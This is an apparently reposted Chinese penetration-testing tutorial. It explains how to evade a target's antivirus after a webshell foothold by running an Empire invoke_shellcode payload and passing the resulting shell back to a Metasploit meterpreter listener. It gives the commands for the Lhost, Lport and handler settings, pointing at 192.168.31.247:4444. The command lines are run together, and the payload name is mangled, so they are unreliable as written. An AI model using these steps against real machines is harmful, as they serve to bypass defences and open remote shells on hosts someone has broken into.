使用SoapUI测试webservice接口详细步骤
280
2022-10-02
渗透之——Empire 反弹回 Metasploit(渗透 释义)
在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。
这里使用Empire的usemodule code_execution/invoke_shellcode模块修改两个参数:Lhost、Lport。将Lhost修改为MSF所在主机的IP,按以下命令设置:
set Lhost 192.168.31.247set Lport 4444
在MSF上设置监听,命令如下:
use exploit/multi/handlerset payload windows/meterpreter/reverse_lhost 192.168.31.247set lport 4444run
运行后,就可以收到Empire反弹回来的Shell
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~